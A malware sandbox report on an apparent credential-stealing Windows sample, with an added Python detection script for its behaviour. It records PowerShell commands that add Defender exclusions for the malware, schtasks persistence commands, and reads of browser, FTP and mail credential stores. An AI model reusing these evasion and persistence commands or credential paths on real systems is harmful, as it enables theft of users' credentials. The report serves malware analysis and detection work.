Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1196765
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1196656
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1196546
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1196437
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1196328
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1196218
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1196109
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1196000
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1195890
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1195781
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1195671
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1195562
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1195453
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1195343
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1195219
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1195059
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1194953
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1194843
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1194734
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1194624
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Thread delayed: delay time: 1194515
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1199874
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1199765
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1199656
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1199546
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1199437
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1199328
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1199218
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1199109
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1198999
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1198890
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1198662
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1198531
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1198421
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1198312
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1198202
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1198092
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1197984
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1197874
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1197765
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1197655
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1197546
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1197429
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1197312
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1197203
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1197093
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1196984
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1196874
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1196764
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1196656
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1196546
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1196437
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1196328
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1196218
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1196109
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1195999
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1195888
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1195781
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1195671
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1195562
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1195453
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1195343
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1195234
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1195124
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1195014
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1194906
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1194796
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1194687
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1194559
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Thread delayed: delay time: 1194452
Source: hesaphareketi-.exe, 00000008.00000002.4488496457.000000000134E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllstringVirtualizationFirmwareEnabled
Source: xyodEPhulIrkY.exe, 0000000D.00000002.4489177545.0000000000F68000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\hesaphareketi-.exeProcess created: C:\Users\user\Desktop\hesaphareketi-.exe "C:\Users\user\Desktop\hesaphareketi-.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpBF7D.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exeProcess created: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Queries volume information (VolumeInformation):
  C:\Users\user\Desktop\hesaphareketi-.exe
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
  C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information (VolumeInformation):
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
  C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
  C:\
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
  C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
  C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Queries volume information (VolumeInformation):
  C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
  C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
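The Add-MpPreference and schtasks /XML process creations recorded in this section are the cleanest detection hooks the report offers. As an added example that is not part of the Joe Sandbox report, the Python below applies two checks to process-creation events (parent image, image, command line, the fields Sysmon Event ID 1 carries): a Defender exclusion added from PowerShell, ranked higher when the excluded path is the parent's own image or lies under a user-writable directory, and a schtasks /Create whose /XML definition sits in a temp directory. The sample events are constructed from the command lines in the report plus two benign controls; the ProcessEvent and Finding types, the rule names and the severities are this example's own choices. Because the report shows the child image under SysWOW64 while the command line names System32 (WOW64 file-system redirection for the 32-bit parent), the checks match on the executable name rather than its directory.

```python
"""Detection logic for two patterns from the report: a Defender exclusion added
through powershell.exe, and a scheduled task created from an XML file in a
temp directory. Input is process-creation telemetry (parent image, image,
command line), e.g. Sysmon Event ID 1. Sample data below is constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str   # full path of the creating process
    image: str          # full path of the created process
    command_line: str   # raw command line, Windows quoting


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    detail: str


# Windows command lines are not POSIX-quoted, so use regexes rather than shlex.
# Add-MpPreference accepts a comma-separated list; only the first value is inspected.
_EXCLUSION_RE = re.compile(
    r'(?i)\bAdd-MpPreference\b.*?-Exclusion(Path|Process|Extension)\s+(?:"([^"]+)"|(\S+))')
_TASK_XML_RE = re.compile(r'(?i)/XML\s+(?:"([^"]+)"|(\S+))')
_TASK_NAME_RE = re.compile(r'(?i)/TN\s+(?:"([^"]+)"|(\S+))')
_USER_WRITABLE_RE = re.compile(r'(?i)\\(Users|ProgramData|Temp)\\')
_TEMP_DIR_RE = re.compile(r'(?i)\\(AppData\\Local\\Temp|Windows\\Temp)\\')


def _basename(path: str) -> str:
    # Compare on the file name only: SysWOW64 vs System32 differs with WOW64 redirection.
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_defender_exclusion(ev: ProcessEvent):
    """Flag Add-MpPreference -Exclusion* run from PowerShell, ranked by where the excluded path lives."""
    if _basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return None
    m = _EXCLUSION_RE.search(ev.command_line)
    if not m:
        return None
    kind, value = m.group(1), (m.group(2) or m.group(3))
    if value.lower() == ev.parent_image.lower():
        severity, why = "high", "parent process excludes its own image"
    elif _USER_WRITABLE_RE.search(value):
        severity, why = "high", "excluded path is user-writable"
    else:
        severity, why = "medium", "exclusion added outside a management tool"
    return Finding("defender_exclusion_added", severity,
                   f"Exclusion{kind}={value} ({why}); parent={ev.parent_image}")


def check_temp_task_xml(ev: ProcessEvent):
    """Flag schtasks /Create whose /XML task definition sits in a temp directory."""
    if _basename(ev.image) != "schtasks.exe" or "/create" not in ev.command_line.lower():
        return None
    m = _TASK_XML_RE.search(ev.command_line)
    if not m:
        return None
    xml_path = m.group(1) or m.group(2)
    if not _TEMP_DIR_RE.search(xml_path):
        return None
    tn = _TASK_NAME_RE.search(ev.command_line)
    task_name = (tn.group(1) or tn.group(2)) if tn else "?"
    return Finding("scheduled_task_from_temp_xml", "high",
                   f"task {task_name} defined by {xml_path}; parent={ev.parent_image}")


def analyze(events):
    """Run every check over every event; returns findings in event order."""
    findings = []
    for ev in events:
        for check in (check_defender_exclusion, check_temp_task_xml):
            f = check(ev)
            if f is not None:
                findings.append(f)
    return findings


# Constructed sample: the first three events reproduce the report's command lines;
# the last two are benign controls (hypothetical paths) that must not alert.
_PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
_PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_PARENT = r"C:\Users\user\Desktop\hesaphareketi-.exe"
SAMPLE_EVENTS = [
    ProcessEvent(_PARENT, _PS32, rf'"{_PS64}" Add-MpPreference -ExclusionPath "{_PARENT}"'),
    ProcessEvent(_PARENT, _PS32,
                 rf'"{_PS64}" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe"'),
    ProcessEvent(_PARENT, r"C:\Windows\SysWOW64\schtasks.exe",
                 r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xyodEPhulIrkY" /XML "C:\Users\user\AppData\Local\Temp\tmpE555.tmp"'),
    ProcessEvent(r"C:\Windows\explorer.exe", _PS64, r"powershell.exe Get-MpPreference"),
    ProcessEvent(r"C:\Program Files\Vendor\setup.exe", r"C:\Windows\System32\schtasks.exe",
                 r'schtasks.exe /Create /TN "Vendor\Update" /XML "C:\ProgramData\Vendor\update.xml"'),
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"[{finding.severity}] {finding.rule}: {finding.detail}")
```

Run as-is to see the three findings from the report's command lines; in production feed it the same three fields from Sysmon or EDR telemetry. The exclusion check is one layer only: Set-MpPreference also accepts -ExclusionPath, the MSFT_MpPreference WMI class can be driven without PowerShell at all, and the authoritative record of the change is Defender's own event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, which is worth correlating with the process event.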

                    Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4492600143.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4492018819.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: hesaphareketi-.exe PID: 6516, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: hesaphareketi-.exe PID: 5300, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xyodEPhulIrkY.exe PID: 2828, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xyodEPhulIrkY.exe PID: 1628, type: MEMORYSTR
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\hesaphareketi-.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\hesaphareketi-.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\xyodEPhulIrkY.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4492600143.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4492018819.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: hesaphareketi-.exe PID: 6516, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: hesaphareketi-.exe PID: 5300, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xyodEPhulIrkY.exe PID: 2828, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xyodEPhulIrkY.exe PID: 1628, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 0.2.hesaphareketi-.exe.3474e08.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xyodEPhulIrkY.exe.3645378.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hesaphareketi-.exe.34af428.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.hesaphareketi-.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xyodEPhulIrkY.exe.367f998.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hesaphareketi-.exe.34af428.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xyodEPhulIrkY.exe.367f998.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.xyodEPhulIrkY.exe.3645378.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.hesaphareketi-.exe.3474e08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000D.00000002.4492600143.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4487969528.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2100310326.0000000003645000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4492018819.000000000304E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2069027456.0000000003474000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4492600143.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.4492018819.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: hesaphareketi-.exe PID: 6516, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: hesaphareketi-.exe PID: 5300, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xyodEPhulIrkY.exe PID: 2828, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: xyodEPhulIrkY.exe PID: 1628, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    11
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Encrypted Channel
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
